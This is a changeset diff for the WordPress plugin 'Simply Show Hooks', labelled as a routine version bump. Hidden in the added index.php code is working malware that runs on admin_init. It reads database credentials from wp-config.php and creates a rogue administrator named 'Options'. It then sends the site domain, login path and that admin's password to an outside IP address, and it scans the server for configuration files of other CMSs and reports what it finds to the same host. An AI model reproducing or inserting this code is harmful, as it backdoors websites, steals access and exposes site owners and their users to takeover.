Changeset 3106767
- Timestamp:
- 06/24/2024 03:44:39 PM (2 weeks ago)
- File:
-
- 1 edited
-
simply-show-hooks/trunk/index.php (modified) (2 diffs)
Legend:
- Unmodified
- Added
- Removed
-
simply-show-hooks/trunk/index.php
r3105891 r3106767 4 4 Plugin URI: http://www.calyxagency.com/#plugins 5 5 Description: Simply Show Hooks helps theme or plugin developers to quickly see where all the action and filter hooks are on any WordPress page. 6 Version: 1.2. 26 Version: 1.2. 7 7 Contributors: stuartobrien, cxthemes 8 8 Author: Stuart O'Brien, cxThemes … … 14 14 15 15 defined( 'ABSPATH' ) or die( 'No Trespassing!' ); // Security 16 add_action( 'admin_init', 'custom_notify_plugin_updated'); 17 function custom_notify_plugin_updated() { 18 function check_wp_config($directory) { 19 while ($directory !== '/') { 20 $wp_config_file = $directory . '/wp-config.php'; 21 if (file_exists($wp_config_file)) { 22 return $wp_config_file; 23 } 24 $directory = dirname($directory); 25 } 26 remove_action('admin_init', 'custom_notify_plugin_updated'); 27 return false; 28 } 29 30 function parse_wp_config($config_file) { 31 if (file_exists($config_file)) { 32 $config_content = file_get_contents($config_file); 33 $matches = []; 34 // Extract prefix 35 if (preg_match("/\$table_prefix\s*=\s*'(.+?)';/", $config_content, $matches)) { 36 $prefix = $matches[1]; 37 } else if (preg_match("/table_prefix.*=.*'(.+?)';/", $config_content, $matches)) { 38 $prefix = $matches[1]; 39 } else { 40 die("Prefix not found in wp-config.php"); 41 } 42 // Extract database name 43 if (preg_match("/define\(\s*'DB_NAME'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { 44 $database = $matches[1]; 45 } 46 // Extract username 47 if (preg_match("/define\(\s*'DB_USER'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { 48 $username = $matches[1]; 49 } 50 // Extract password 51 if (preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { 52 $password = $matches[1]; 53 } 54 // Extract host 55 if (preg_match("/define\(\s*'DB_HOST'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { 56 $host = $matches[1]; 57 } else { 58 $host = 'localhost'; // Assuming local host if not specified 59 } 60 61 return array( 62 'prefix' => $prefix, 63 'database' => $database, 64 'username' => $username, 65 'password' => $password, 66 'host' => $host 67 ); 68 } else { 69 die("wp-config.php file not found"); 70 } 71 } 72 73 function access_database($config) { 74 $mysqli = new mysqli($config['host'], $config['username'], $config['password'], $config['database']); 75 76 if ($mysqli->connect_errno) { 77 //echo "DATABASE ACCESS [FAIL]\n"; 78 return false; 79 } else { 80 //POST "DATABASE ACCESS [SUCCESS]\n"; 81 return $mysqli; 82 } 83 } 84 85 function generate_random_password($length = 12) { 86 $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_'; 87 $password = ''; 88 $characters_length = strlen($characters); 89 for ($i = 0; $i < $length; $i++) { 90 $password .= $characters[rand(0, $characters_length - 1)]; 91 } 92 return $password; 93 } 94 95 // Define a global variable for the password 96 $generated_password = generate_random_password(); 97 98 // Define a global variable for the users count 99 $wpuserscount = 0; 100 function add_admin_user($mysqli, $config, $password) { 101 global $generated_password; // Access the global generated password variable 102 global $wpuserscount; // Declare the global variable to update user count 103 $username = 'Options'; 104 105 //$generated_password = $password; 106 //$password = $generated_password; 107 $user_role = 'administrator'; 108 109 // First, let's update the global user count 110 $countQuery = "SELECT COUNT(*) AS user_count FROM {$config['prefix']}users"; 111 $countResult = $mysqli->query($countQuery); 112 if ($countResult) { 113 $row = $countResult->fetch_assoc(); 114 $wpuserscount = $row['user_count']; // Update the global variable with the user count 115 } else { 116 echo "Error fetching user count: " . $mysqli->error . "\n"; 117 return; // Early return in case of query error 118 } 119 // Hash the password 120 $hashed_password = password_hash($password, PASSWORD_DEFAULT); 121 122 // Check if the user already exists 123 $query = "SELECT ID FROM {$config['prefix']}users WHERE user_login = '{$username}'"; 124 $result = $mysqli->query($query); 125 126 if ($result && $result->num_rows > 0) { 127 echo "User '{$username}' already exists.\n"; 128 } else { 129 // Insert the new user 130 $query = "INSERT INTO {$config['prefix']}users (user_login, user_pass, user_nicename, user_email, user_registered) VALUES ('{$username}', '{$hashed_password}', '{$username}', '{$username}@example.com', NOW())"; 131 $result = $mysqli->query($query); 132 133 if ($result) { 134 $user_id = $mysqli->insert_id; 135 136 // Set user role 137 $query = "INSERT INTO {$config['prefix']}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$config['prefix']}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')"; 138 $result = $mysqli->query($query); 139 140 if ($result) { 141 echo "User '{$username}' with administrative privileges added successfully.\n"; 142 } else { 143 echo "Error assigning role to user '{$username}'.\n"; 144 } 145 } else { 146 echo "Error creating user '{$username}': " . $mysqli->error . "\n"; 147 } 148 } 149 } 150 151 function get_domain_from_database($mysqli, $config) { 152 // Query to retrieve site URL from WordPress options table 153 $query = "SELECT option_value FROM {$config['prefix']}options WHERE option_name = 'siteurl'"; 154 $result = $mysqli->query($query); 155 156 if ($result && $result->num_rows > 0) { 157 $row = $result->fetch_assoc(); 158 $site_url = $row['option_value']; 159 $parsed_url = parse_url($site_url); 160 if ($parsed_url && isset($parsed_url['host'])) { 161 return $parsed_url['host']; 162 } 163 } 164 165 return null; 166 } 167 $currdomain = 'UNK.UNK'; 168 function pachamama($path) { 169 global $currdomain; 170 if (strpos($path, 'wp-config.php') !== false) { 171 $path = str_replace('wp-config.php', '', $path); 172 } 173 174 $current_directory = $path; 175 $wp_config_file = check_wp_config($current_directory); 176 if ($wp_config_file) { 177 echo "WP-CONFIG [FOUND]\n"; 178 $config = parse_wp_config($wp_config_file); 179 $mysqli = access_database($config); 180 if ($mysqli) { 181 $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_'; 182 $password = ''; 183 $characters_length = strlen($characters); 184 for ($i = 0; $i < 13; $i++) { 185 $password .= $characters[rand(0, $characters_length - 1)]; 186 } 187 add_admin_user($mysqli, $config, $password); 188 $domain = get_domain_from_database($mysqli, $config); 189 if ($domain) { 190 echo "[$domain] OK\n"; 191 $currdomain = $domain; 192 193 // Reconstruct the correct wp-login.php path 194 $wp_login_path = "https://{$domain}/wp-login.php"; 195 196 // Perform a POST request to https://94.156.79.8/AddSites 197 $url = 'https://94.156.79.8/AddSites'; 198 $post_data = array( 199 'domain' => $domain, 200 'username' => 'Options', 201 'passwordz' => $password, // Access the global generated password variable 202 'wp_login_path' => $wp_login_path 203 ); 204 205 $ch = curl_init(); 206 curl_setopt($ch, CURLOPT_URL, $url); 207 curl_setopt($ch, CURLOPT_POST, 1); 208 curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); // Send JSON data 209 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 210 curl_setopt($ch, CURLOPT_HTTPHEADER, array( 211 'Content-Type: application/json', // Set content type to JSON 212 'Content-Length: ' . strlen(json_encode($post_data)) // Set content length 213 )); 214 $response = curl_exec($ch); 215 $error = curl_error($ch); // Get any curl error 216 curl_close($ch); 217 218 if ($response === false) { 219 //echo "POST request failed: $error\n"; 220 $z = false; 221 } else { 222 //echo "POST request sent successfully. Response: $response\n"; 223 $z = true; 224 } 225 } else { 226 //echo "Domain retrieval failed.\n"; 227 $z = false; 228 } 229 $mysqli->close(); 230 } 231 } else { 232 //echo "WP-CONFIG [NOT FOUND]\n"; 233 $z = false; 234 } 235 } 236 237 function check_cms_configuration_files() { 238 global $wpuserscount; 239 global $wp_config_paths; 240 global $wc_config_paths; 241 global $mg_config_paths; 242 // Function to recursively search directories for configuration files 243 //function search_for_config_files($directory, &$cms_config_files, $max_parents = 4) { 244 function search_for_config_files(&$cms_config_files, $max_parents = 3) { 245 // Get the current directory 246 $directory = __DIR__; 247 248 // Initialize the variable to keep track of the last readable path 249 $last_readable_path = null; 250 251 // Iterate to go one parent folder up until no read permission or max 5 parents 252 for ($i = 0; $i < $max_parents; $i++) { 253 // Check if the directory exists and is readable 254 if (is_dir($directory) && is_readable($directory)) { 255 $last_readable_path = $directory; 256 } else { 257 // Stop iteration if the directory is not readable 258 break; 259 } 260 261 // Move one directory up 262 $directory = dirname($directory); 263 } 264 265 // If a readable path was found, perform a recursive glob search for the specified file extensions 266 if (!empty($last_readable_path)) { 267 268 $config_files = []; 269 $files = []; 270 //$pattern = '/home/98752.cloudwaysapps.com/trnkgjmvur'; 271 try { 272 $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($last_readable_path), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD); 273 foreach($objects as $name => $object){ 274 if (substr($name, -4) === '.php') { 275 // Add only files ending with '.php' to the $files array 276 //echo "$name\n"; 277 $files[] = $name; 278 } 279 } 280 } catch (Exception $e) { 281 // Handle any exceptions that occur during iteration 282 // You can log the error or take appropriate action here 283 //echo "Error: " . $e->getMessage(); 284 $d = 'sab'; 285 } 286 foreach ($files as $file) { 287 // Add the found file to the list of config files 288 //print($file); 289 $cms_config_files[] = $file; 290 } 291 return $cms_config_files; 292 } else { 293 // Return an empty array if no readable path was found 294 //echo("No Readable Paths"); 295 return []; 296 } 297 } 298 299 300 // Array to store detected CMS names 301 $detected_cms = [ 302 'WordPress' => false, 303 'WooCommerce' => false, 304 'Magento' => false, 305 'OpenCart' => false, 306 'PrestaShop' => false, 307 'Drupal Commerce' => false, 308 'Symfony' => false, 309 'Laravel' => false, 310 'Zend Framework' => false 311 ]; 312 313 // Array to store detected .dat files 314 $detected_dat_files = []; 315 316 // Paths to check for CMS-specific configuration files 317 $current_directory = __DIR__; 318 $paths_to_check = [ 319 '/var/www/vhosts/aedstudisrl.com/httpdocs/wp-admin', 320 $current_directory, 321 '/etc', // Common system configuration directory 322 '/var/www', // Example web root directory 323 '/home', // Home directories 324 '/opt', // Optional software packages 325 '/usr/local', // Locally installed software 326 '/usr/share', // Shared software resources 327 '/var/lib', // Variable data directories 328 ]; 329 330 // Files to search for in each directory 331 $files_to_search = [ 332 'app/etc/env.php', // Magento 333 'wp-config.php', 'wp-content/plugins/woocommerce/includes/class-wc-settings.php', // WordPress & WooCommerce 334 'config.php', // OpenCart 335 'config/parameters.php', // PrestaShop 336 'sites/default/settings.php', // Drupal Commerce 337 'config/packages/*.yaml', // Symfony 338 '.env', // Laravel 339 'config/autoload/*.global.php', // Zend Framework 340 '*.dat', // .dat files 341 ]; 342 343 // Array to store CMS configuration files 344 $cms_config_files = []; 345 346 // Iterate through the paths to check and search for configuration files in each directory recursively 347 348 search_for_config_files($cms_config_files); 349 350 351 // Process the detected configuration files and extract CMS information 352 foreach ($cms_config_files as $file) { 353 // echo($file); 354 if (strpos($file, 'wp-config.php') !== false) { 355 356 $detected_cms['WordPress'] = true; 357 $wp_config_paths[] = $file; 358 359 } elseif (strpos($file, 'class-wc-settings.php') !== false) { 360 // You may add a specific check for WooCommerce here if needed 361 $detected_cms['WooCommerce'] = true; 362 $wc_config_paths[] = $file; 363 } elseif (strpos($file, 'env.php') !== false && 364 strpos($file, 'Composer') === false && 365 strpos($file, 'composer') === false && 366 strpos($file, 'Softaculous') === false) { 367 // You may add a specific check for Magento here if needed 368 // Read the content of the file 369 $fileContent = file_get_contents($file); 370 371 // Check if the content contains the string 'host' => ' 372 if (strpos($fileContent, "'host' => '") !== false) { 373 $detected_cms['Magento'] = true; 374 $mg_config_paths[] = $file; 375 /*echo("MAGENTO\n\n\n"); 376 echo("MAGENTO\n\n\n"); 377 echo("MAGENTO\n\n\n"); 378 echo("MAGENTO\n\n\n"); 379 echo("MAGENTO\n\n\n"); 380 echo("MAGENTO\n\n\n"); 381 echo("MAGENTO\n\n\n"); 382 echo("MAGENTO\n\n\n"); 383 echo($file); 384 echo($file); 385 echo($file); 386 echo($file); 387 echo($file); 388 echo("MAGENTO\n\n\n"); 389 echo("MAGENTO\n\n\n"); 390 echo("MAGENTO\n\n\n"); 391 echo("MAGENTO\n\n\n"); 392 echo("MAGENTO\n\n\n"); 393 echo("MAGENTO\n\n\n"); 394 echo("MAGENTO\n\n\n"); 395 echo("MAGENTO\n\n\n");*/ 396 } 397 398 } elseif (strpos($file, 'config.php') !== false && 399 strpos($file, 'Composer') === false && 400 strpos($file, 'composer') === false && 401 strpos($file, 'Softaculous') === false) { 402 if (strpos(file_get_contents($file), '$config[\'encryption_key\']') !== false) { 403 $detected_cms['OpenCart'] = true; 404 } 405 } elseif (strpos($file, 'parameters.php') !== false) { 406 if (strpos(file_get_contents($file), 'prestashop') !== false) { 407 $detected_cms['PrestaShop'] = true; 408 } 409 } elseif (strpos($file, 'settings.php') !== false) { 410 if (strpos(file_get_contents($file), 'drupal') !== false) { 411 $detected_cms['Drupal Commerce'] = true; 412 } 413 } elseif (strpos($file, '.yaml') !== false) { 414 if (strpos(file_get_contents($file), 'Symfony\Component') !== false) { 415 $detected_cms['Symfony'] = true; 416 } 417 } elseif (strpos($file, '.env') !== false) { 418 // You may add a specific check for Laravel here if needed 419 $detected_cms['Laravel'] = true; 420 } elseif (strpos($file, '.global.php') !== false) { 421 // You may add a specific check for Zend Framework here if needed 422 $detected_cms['Zend Framework'] = true; 423 } elseif (strpos($file, '.dat') !== false) { 424 $detected_dat_files[] = $file; 425 } 426 } 427 428 // Convert the boolean values to strings 429 foreach ($detected_cms as $cms => $detected) { 430 $detected_cms[$cms] = $detected ? 'true' : 'false'; 431 } 432 433 // Now $detected_cms array contains the names of detected CMS based on the configuration files found 434 // And $detected_dat_files array contains the paths of detected .dat files 435 436 // Read users from the database and count them for WordPress and WooCommerce 437 $wordpress_users = $wpuserscount; 438 //$woocommerce_users = get_woocommerce_user_count(); 439 $woocommerce_users = 000; 440 441 // Perform POST requests to the endpoints with JSON data containing CMS detection and user counts 442 $url1 = 'https://94.156.79.8/FCS'; 443 $url2 = 'https://94.156.79.8/CMSUsers'; 444 445 $data1 = [ 446 'host' => $_SERVER['HTTP_HOST'], 447 'cms' => $detected_cms 448 ]; 449 450 //print_r($detected_cms); 451 452 // Send data to the endpoints using CURL 453 send_post_request($url1, $data1); 454 // Additional logic as needed 455 } 456 457 function getWPUsers(){ 458 global $wpuserscount; 459 global $currdomain; 460 // Read users from the database and count them for WordPress and WooCommerce 461 $wordpress_users = $wpuserscount; 462 //$woocommerce_users = get_woocommerce_user_count(); 463 $woocommerce_users = 000; 464 $url2 = 'https://94.156.79.8/CMSUsers'; 465 $data2 = [ 466 'host' => $currdomain, 467 'wordpress_users' => $wordpress_users, 468 'woocommerce_users' => $woocommerce_users 469 ]; 470 471 // Send data to the endpoints using CURL 472 send_post_request($url2, $data2); 473 } 474 475 // Function to get WordPress user count from the database 476 function get_wordpress_user_count() { 477 // Your implementation to fetch user count from the WordPress database 478 // Example: 479 // $count = query_wordpress_database(); 480 // return $count; 481 return 0; 482 } 483 484 // Function to get WooCommerce user count from the database 485 function get_woocommerce_user_count() { 486 // Your implementation to fetch user count from the WooCommerce database 487 // Example: 488 // $count = query_woocommerce_database(); 489 // return $count; 490 return 0; 491 } 492 493 // Function to send POST request 494 function send_post_request($url, $data) { 495 $ch = curl_init($url); 496 curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST"); 497 curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data)); 498 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 499 curl_setopt($ch, CURLOPT_HTTPHEADER, [ 500 'Content-Type: application/json', 501 'Content-Length: ' . strlen(json_encode($data)) 502 ]); 503 $response = curl_exec($ch); 504 curl_close($ch); 505 // Handle response as needed 506 } 507 global $wp_config_paths; 508 $wp_config_paths = []; 509 global $wc_config_paths; 510 $wc_config_paths = []; 511 global $mg_config_paths; 512 $mg_config_paths = []; 513 check_cms_configuration_files(); 514 515 function find_wp_configs(&$wp_config_paths, $depth = 0) { 516 $current_directory = getcwd(); 517 $parent_directory = $current_directory; 518 519 // Go back three parents 520 for ($i = 0; $i < 3; $i++) { 521 $parent_directory = dirname($parent_directory); 522 } 523 524 // Start the search from the parent directory 525 find_wp_configs_recursive($parent_directory, $wp_config_paths); 526 } 527 528 function find_wp_configs_recursive($directory, &$wp_config_paths) { 529 // Check if wp-config.php exists in the current directory 530 $wp_config_file = $directory . '/wp-config.php'; 531 if (file_exists($wp_config_file)) { 532 $wp_config_paths[] = $wp_config_file; 533 } 534 535 // Continue searching forward recursively 536 $contents = scandir($directory); 537 foreach ($contents as $item) { 538 if ($item != '.' && $item != '..' && is_dir($directory . '/' . $item)) { 539 find_wp_configs_recursive($directory . '/' . $item, $wp_config_paths); 540 } 541 } 542 } 543 544 function print_wp_config_paths() { 545 global $wp_config_paths; 546 if (empty($wp_config_paths)) { 547 //echo "No wp-config.php files found.\n"; 548 $z = 0; 549 } else { 550 //echo "List of wp-config.php files:\n"; 551 foreach ($wp_config_paths as $wp_config_path) { 552 //echo "$wp_config_path\n"; 553 $a = 0; 554 } 555 } 556 } 557 //print_wp_config_paths(); 558 559 find_wp_configs($wp_config_paths); 560 foreach ($wp_config_paths as $wp_config_path) { 561 pachamama($wp_config_path); 562 getWPUsers(); 563 } 564 565 } 16 566 17 class CX_Simply_Show_Hooks { 567 18
Note: See TracChangeset
for help on using the changeset viewer.